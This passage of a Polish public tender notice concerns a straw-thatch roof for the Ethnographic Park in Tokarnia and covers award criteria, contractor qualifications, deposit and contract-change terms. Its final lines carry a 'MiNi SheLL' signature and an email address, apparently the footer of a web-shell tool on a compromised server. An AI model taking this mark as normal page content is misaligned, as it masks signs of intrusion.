G</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, wobec których nie zachodzi podstawa do wykluczenia z<br/>postępowania, o których mowa w Rozdziale VI oraz spełniają warunki udziału w postępowaniu określone w art. 112 ust. 2<br/>ustawy Pzp dotyczące:<br/>1.1. Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w w/w zakresie.<br/>1.2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w w/w zakresie.<br/>1.3. Sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w w/w zakresie.<br/>1.4 Zdolności technicznej lub zawodowej - Zamawiający uzna warunek za spełniony, jeżeli Wykonawca:<br/>1.4.1. wykaże, że w okresie ostatnich 5 lat liczonych wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie wykonał należycie roboty budowlane polegające na pokryciu dachu<br/>strzechą słomianą na co najmniej dwóch obiektach, w tym jednym obiekcie o powierzchni dachu nie mniejszej niż 100 m2.<br/>1.4.2. wykaże, że dysponuje osobą, skierowaną przez niego do realizacji zamówienia publicznego, pełniącą funkcję<br/>kierownika robót (kierownika budowy), posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności konstrukcyjno – budowlanej, która zgodnie z art. 37 c ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i<br/>opiece nad zabytkami, przez co najmniej 18 miesięcy brała udział w robotach budowlanych prowadzonych przy zabytkach<br/>nieruchomych wpisanych do rejstru lub inwentarza muzeum będącego instytucją kultury<br/>W Załączniku Nr 7 do SWZ – Wykaz osób, Wykonawca potwierdza/nie potwierdza że zaproponowana osoba posiada<br/>wymagane uprawnienia i przynależy do właściwej izby samorządu zawodowego jeżeli wymóg taki na tą osobę nakłada<br/>Prawo budowlane<br/>Zgodnie z art. 12a Prawa budowlanego który odsyła do ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji<br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2020 r., poz. 220) przynależność do właściwej<br/>izby samorządu zawodowego nie jest wymagana od obywateli państw członkowskich Unii Europejskiej, Konfederacji<br/>Szwajcarskiej lub państwa członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) gdyż do posiadania<br/>uprawnień w wykonywaniu samodzielnych funkcji w budownictwie nie jest wymagana przynależność do izby samorządu<br/>zawodowego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym<br/>terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych<br/>potwierdzających brak podstaw wykluczenia Wykonawcy, tj.:<br/>1. Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji<br/>i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – wg Załącznika Nr 5 do SWZ.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej składa każdy z wykonawców.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych potwierdzających spełnianie warunków udziału w postępowaniu:, tj.:<br/>1. Wykazu robót budowlanych wykonanych nie wcześniej niż w okresie 5 lat liczonych wstecz od dnia, w którym upływa termin<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane – wg Załącznika Nr 6 do SWZ „Wykaz robót” oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty<br/>2. Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nich czynności wraz z informacją o podstawie do dysponowania tymi osobami – Załącznik Nr 7 do SIWZ „Wykaz osób”</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oferta składa się z wypełnionego i podpisanego Formularza ofertowego - wg Załącznika Nr 1 do SWZ.<br/>2. W celu potwierdzenia, że Wykonawca nie podlega wykluczeniu<br/>oraz spełnia warunki udziału w postępowaniu wraz z ofertą winien złożyć następując dokumenty:<br/>2.1. Oświadczenia, o których mowa w art. 125 ust. 1 ustawy Pzp o niepodleganiu wykluczeniu i spełnianiu warunków udziału<br/>w postępowaniu – wg Załącznika Nr 2 i Nr 3 do SWZ;<br/>2.2. Oświadczenia, o których mowa w art. 125 ust. 5 ustawy Pzp o niepodleganiu wykluczeniu i spełnianiu warunków udziału<br/>w postępowaniu przez podmiot udostępniający zasoby, w zakresie jakim Wykonawca powołuje się na jego zasoby, jeżeli<br/>Wykonawca polega na zasobach tego podmiotu – wg Załącznika Nr 2a<br/>i 3a do SWZ.<br/>2.3. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców, oświadczenia o których mowa w<br/>ust. 2 pkt 2.1 składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Wykaz pozostałych dokumentów:<br/>3.1. Zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji Wykonawcy niezbędnych zasobów na<br/>potrzeby realizacji zamówienia (wg Załącznika Nr 8 do SWZ) lub inny podmiotowy środek dowodowy, potwierdzający, że<br/>Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów wymagane<br/>postanowieniami rozdz. VIII SWZ - w przypadku, gdy Wykonawca polega na zdolnościach podmiotów udostępniających<br/>zasoby w celu potwierdzenia spełniania warunków udziału w postępowaniu (o ile dotyczy).<br/>3.2. Oświadczenie, o którym mowa w art. 117 ust. 4 Pzp, z którego wynika, które roboty wykonają poszczególni Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia – w przypadku, gdy ofertę składają Wykonawcy wspólnie ubiegający się o<br/>zamówienie (o ile dotyczy) – wg Załącznika Nr 4 do SWZ;<br/>3.3. Dokumenty, potwierdzające umocowanie do reprezentowania odpowiednio Wykonawcy, Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia publicznego, podmiotu udostępniającego zasoby – odpis lub informacja z<br/>Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego<br/>rejestru, chyba że Wykonawca wskaże w Formularzu oferty dane, umożliwiające Zamawiającemu uzyskanie tych<br/>dokumentów za pomocą bezpłatnych i ogólnodostępnych baz danych.<br/>3.4. W przypadku wspólnego ubiegania się o udzielenie zamówienia Wykonawców występujących wspólnie (dotyczy<br/>również spółki cywilnej) - pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego lub inny dokument (np. umowa o<br/>współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo).<br/>3.5. Pełnomocnictwo określające jego zakres – w przypadku gdy Wykonawcę, podmiot udostępniający zasoby, reprezentuje<br/>pełnomocnik.<br/>4. Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza zobowiązuje się:<br/>- przekazać kopie stosownych uprawnień budowlanych wraz z aktualnymi zaświadczeniami o przynależności do właściwej<br/>izby samorządu zawodowego, jeżeli wobec wskazanej osoby<br/>powstaje taki obowiązek<br/>- posiadać przez cały okres obowiązywania umowy, umowę ubezpieczenia od wszelkiego ryzyka i odpowiedzialności<br/>związanej z realizacją umowy, oraz do terminowego opłacania<br/>należnych składek ubezpieczeniowych, w zakresie odpowiedzialności cywilnej Wykonawcy z<br/>tytułu prowadzonej działalności gospodarczej, obejmującej swym zakresem szkody powstałe w<br/>związku z wykonywaniem prac objętych przedmiotem Umowy, na sumę gwarancyjną nie niższą niż 500 000 zł.<br/>- wnieść zabezpieczenie należytego wykonania umowy<br/>- w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - kopię umowy regulującej ich współpracę. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wadium w wysokości: 7 000,00 zł (słownie: siedem tysięcy złotych 00/100) należy wnieść przed upływem terminu składania ofert.<br/>2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:<br/>Nr rachunku: 77 8493 0004 0000 0061 8263 0063<br/>z dopiskiem „Wadium&#34; i Nr postępowania: MWK.DIZ.271.7.2022<br/>4. W przypadku wnoszenia wadium w formie pieniądza liczy się termin wpływu środków na konto zamawiającego (moment<br/>uznania konta zamawiającego).<br/>5. W przypadku wpłaty wadium w pieniądzu z konta prywatnego (brak nazwy firmy Wykonawcy w nazwie konta), do tytułu<br/>przelewu należy dodać informację o nazwie Wykonawcy, którego oferta zostaje zabezpieczona.<br/>6. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>7. Wadium wnoszone w formach, o których mowa w ust. 2 pkt 2-4 musi wskazywać przedmiot zamówienia i zabezpieczać złożoną ofertę przez cały okres związania Wykonawcy ofertą. Dokument taki musi zawierać nieodwołalne i bezwarunkowe zobowiązanie poręczyciela lub gwaranta wypłacenia Zamawiającemu, na pierwsze jego żądanie, kwoty wadium w przypadkach, o których mowa w art. 98 ust. 6 ustawy Pzp. Wadium w formie niepieniężnej powinno być wniesione w oryginale w postaci elektronicznej.<br/>8. Dowód wniesienia wadium w formie niepieniężnej, w oryginale w postaci elektronicznej należy załączyć do oferty.<br/>9. Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie<br/>do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3)<br/>ustawy Pzp zostanie odrzucona na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>10. Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej<br/>z okoliczności:<br/>1) upływu terminu związania ofertą,<br/>2) zawarcia umowy w sprawie zamówienia publicznego,<br/>3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji, gdy nie zostało rozstrzygnięte odwołanie na<br/>czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>11. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium<br/>Wykonawcy:<br/>1) który wycofał ofertę przed upływem terminu składania ofert,<br/>2) którego oferta została odrzucona,<br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza,<br/>4) po unieważnieniu postępowania, w przypadku, gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo<br/>nie upłynął termin do jego wniesienia.<br/>12. Złożenie wniosku o zwrot wadium, o którym mowa w pkt 9 powyżej, powoduje rozwiązanie stosunku prawnego<br/>z Wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa<br/>w dziale IX ustawy Pzp.<br/>13. Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na<br/>którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za<br/>przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę, a zwrot wadium wniesionego w innej formie niż w<br/>pieniądzu następuje poprzez złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium.<br/>14. Pozostałe informacje dotyczące wadium zostały określone w Rozdziale X SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku wspólnego ubiegania się o udzielenie zamówienia Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo<br/>reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno być załączone do oferty.<br/>3. Korespondencja prowadzona będzie wyłącznie z pełnomocnikiem.<br/>4. Do Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia stosuje się przepisy dotyczące Wykonawców, tj. każdy z Wykonawców składa oświadczenia, o których mowa w<br/>Rozdz. IX ust. 1 pkt 1.1. SWZ oraz w Rozdz. IX ust. 3 pkt 3.1.1. SWZ. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>5.W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych wykonawców, którzy wykonają roboty<br/>budowlane lub usługi do realizacji których te zdolności są wymagane<br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty Oświadczenie, o którym mowa w art. 117 ust. 4 Pzp, z którego wynika, które roboty wykonają poszczególni Wykonawcy wspólnie ubiegający się o udzielenie zamówienia – wg Załącznika Nr 4 do SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana Umowy dopuszczalna jest w przypadku zaistnienia okoliczności wskazanych w art. 455 ust. 1 pkt 2-4 oraz ust. 2<br/>ustawy Pzp oraz w przypadku wskazanym w Projektowanych postanowieniach umowy (Załącznik Nr 10 do SWZ).<br/>2. Zamawiający dopuszcza możliwość zmiany postanowień Umowy w stosunku do treści oferty, na podstawie której<br/>dokonano wyboru Wykonawcy w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym<br/>wpływ na realizację Przedmiotu Zamówienia.<br/>3. Strony mają prawo do przedłużenia terminu zakończenia robót, o okres trwania przyczyn, z powodu których będzie<br/>zagrożone dotrzymanie terminu zakończenia robót, w następujących sytuacjach:<br/>1) w przypadku trwającego dłużej niż jeden dzień załamania warunków atmosferycznych uniemożliwiającego realizację<br/>robót budowlanych na obszarze Parku Etnograficznego w Tokarni (średnia dzienna opadów większa niż 40 mm, wiatr<br/>wiejący w porywach z prędkością powyżej 60 km/h),<br/>2) w przypadku działania siły wyższej (np. pożary, powodzie, klęski żywiołowe, strajki generalne, lub lokalne, epidemie oraz<br/>inne uwarunkowania niezależne od producenta materiałów dostarczającego główne materiały lub sprzęt czynniki które<br/>wstrzymały produkcję), mającej bezpośredni wpływ na terminowość wykonania robót,<br/>3) w przypadku przestojów i opóźnień zawinionych przez Zamawiającego,<br/>4) w przypadku wystąpienia konieczności wykonania robót zamiennych, zamówień dodatkowych, jeśli konieczność<br/>wykonania prac nie jest następstwem okoliczności, za które odpowiedzialność ponosi Wykonawca,<br/>5) w przypadku zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją<br/>finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi albo okolicznościami, które nie były możliwe do<br/>przewidzenia w chwili zawarcia Umowy,<br/>4. Zmiana wysokości wynagrodzenia należnego Wykonawcy, w przypadku:<br/>1) zmiany stawki podatku od towarów i usług, jeżeli zmiana ta będzie miała wpływ na koszty wykonywania Umowy przez<br/>Wykonawcę. Jeśli zmiana stawki VAT powodować będzie zwiększenie kosztów realizacji Umowy po stronie Wykonawcy,<br/>Zamawiający dopuszcza możliwość zmiany wynagrodzenia umownego o wysokość różnicy między obowiązującą stawką<br/>podatku VAT w chwili zawarcia Umowy a stawką podatku VAT wprowadzoną znowelizowaną ustawą o podatku od towarów<br/>i usług;<br/>2) w przypadku zlecenia wykonania robót zamiennych, zamówień dodatkowych oraz robót wynikających z zaleceń organów<br/>uprawnionych np. Nadzoru budowlanego, Konserwatora, jeśli konieczność wykonania prac nie jest następstwem<br/>okoliczności, za które odpowiedzialność ponosi Wykonawca<br/>5. W zakresie zmiany sposobu realizacji Umowy z samodzielnej realizacji przez Wykonawcę, na realizację z udziałem<br/>podwykonawców lub zmiany zakresu zamówienia powierzonego podwykonawcom, z zastrzeżeniem, że podwykonawcy<br/>będą posiadać właściwości niezbędne do realizacji Umowy (dotyczy przypadku, w którym Wykonawca powierza wykonanie<br/>części zamówienia podwykonawcom);<br/>6. W zakresie zmiany lub rezygnacji z podwykonawców wskazanych w § 4 ust. 2, z zastrzeżeniem postanowień § 4 ust. 1 i 3<br/>projektu umowy;<br/>7. Dopuszcza się zmianę osób skierowanych do realizacji zamówienia:<br/>1) kierownika budowy (robót) – na osobę o kwalifikacjach wymaganych w SWZ<br/>8. Warunkiem wprowadzenia zmian Umowy, o których mowa w ust. 3 pkt. 4) oraz ust. 4 pkt. 2) jest sporządzenie<br/>podpisanego przez Strony protokołu konieczności określającego przyczyny zmiany a w przypadku zmiany wynagrodzenia<br/>do protokołu konieczności Wykonawca zobowiązany jest przedstawić kosztorys zamienny/dodatkowy. Protokół konieczności<br/>(wraz z kosztorysem zamiennym lub dodatkowym – jeśli jest wymagany) będzie załącznikiem do aneksu. W protokole<br/>konieczności określony zostanie także charakter dokonanej zmiany (zmiana istotna/zmiana nieistotna).<br/>9. Pozostałe warunki zmian zostały określone w Załączniku Nr 10 do SWZ (Projektowane postanowienia umowy). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-01 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem &#34;Formularza do złożenia, zmiany, wycofania oferty lub wniosku&#34; dostępnego na ePUAP i udostępnionego również na miniportalu https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-01 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com